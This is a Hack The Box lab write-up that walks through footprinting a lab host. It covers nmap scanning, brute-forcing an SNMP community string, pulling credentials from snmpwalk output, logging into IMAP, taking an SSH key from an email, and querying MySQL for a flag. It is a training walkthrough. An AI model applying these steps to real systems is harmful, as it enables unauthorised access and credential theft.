HTB Footprinting Lab (hard) write-up

This is a concise writeup about hacking an HTB Machine, specifically a task from the footprinting lab at the end of the "Footprinting" module.

• Initial Nmap Scan: An initial Nmap scan of the target 10.129.202.20 revealed several open ports:

    $ sudo nmap -sV 10.129.202.20
    $ sudo nmap -sV -sU 10.129.202.20
  

  Key Findings:

  • OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 on port 22.

  • Dovecot pop3d on ports 110 and 995.

  • Dovecot imapd on ports 143 and 993.

  • Port 161 was open for SNMP.

• SNMP Community String Brute-Force: Trying some scripts for IMAP, POP3 didn’t much help. Then, using onesixtyone with a wordlist, the SNMP community string backup was discovered.

    $ onesixtyone -c wordlists/SecLists/Discovery/SNMP/snmp.txt 10.129.202.20
  

  Key Findings:

  • Community string backup found for 10.129.202.20.

  • System identified as Linux NIXHARD 5.4.0-90-generic.

• SNMP Enumeration with snmp-check: With the backup community string, snmp-check was used to enumerate the system. This provided system information including the hostname (NIXHARD), description (Linux NIXHARD 5.4.0-90-generic) and contact (Admin tech@inlanefreight.htb).

    $ snmp-check -c backup 10.129.202.20
  

  Key Findings:

  • Hostname: NIXHARD.

  • Description: Linux NIXHARD 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64.

  • Contact: Admin <tech@inlanefreight.htb>.

  • Location: Inlanefreight.

• Getting MIB information with snmpwalk: Further enumeration with snmpwalk using the backup community string revealed more detailed information.

    $ snmpwalk -v2c -c backup 10.129.202.20
  

  Key Findings:

  • A string value tom NMds732Js2761 was found at iso.3.6.1.2.1.25.1.7.1.2.1.3.6.66.65.67.75.85.80, which appeared to be a username and password.

  • A script /opt/tom-recovery.sh was referenced.

• IMAPS Login: The discovered credentials tom:NMds732Js2761 were successfully used to log into the IMAPS service on 10.129.202.20.

    $ openssl s_client -connect 10.129.202.20:imaps
    ...<SNIP>...
    a login tom NMds732Js2761
    ...<SNIP>...
  

  Key Findings:

  • Successful login to IMAPS for user tom.

• Retrieving SSH Private Key from Email: Inside the INBOX, an email with the subject "KEY" was found. The body of this email contained an SSH private key.

  Bash

    ...<SNIP>...
    a2 LIST "" "*"
    * LIST (\HasNoChildren) "." Notes
    * LIST (\HasNoChildren) "." Meetings
    * LIST (\HasNoChildren \UnMarked) "." Important
    * LIST (\HasNoChildren) "." INBOX
    a3 SELECT INBOX
    ...<SNIP>...
    a4 FETCH 1 BODY[TEXT]
    ...<SSH KEY>...
  

  Key Findings:

  • Found an email in INBOX with Subject: KEY.

  • The email body contained a -----BEGIN OPENSSH PRIVATE KEY----- block.

• SSH Access: The SSH private key was saved to a file named id_rsa, permissions were set to 600, and SSH access was gained to the NIXHARD machine as user tom.

    $ chmod 600 id_rsa
    $ ssh -i id_rsa tom@10.129.202.20 -v
  

• Post-Login Enumeration and Flag Capture: After gaining SSH access, I navigated the file system. I checked tom's .bash_history and discovered commands related to MySQL.

    $ cat ~/.bash_history
  

  Key Findings from .bash_history:

  • mysql -u tom -p command was executed multiple times.

This led me to connect to MySQL as tom.

    $ mysql -u tom -p
    Enter password:

    show databases;
    use users;
    show tables;
    show columns from users;
    select * from users where username='HTB';

Key Findings from MySQL:

• Listing databases using show databases; revealed a users database.

• Selecting the users database (use users;) and listing tables (show tables;) showed a table also named users.

• Examining the schema of the users table (show columns from users;) showed id, username, and password columns.

• Querying the users table for a specific username HTB (select * from users where username='HTB';) revealed the password for HTB: cr3n4o7rzse7rzhnckhssncif7ds. This was the flag for the CTF.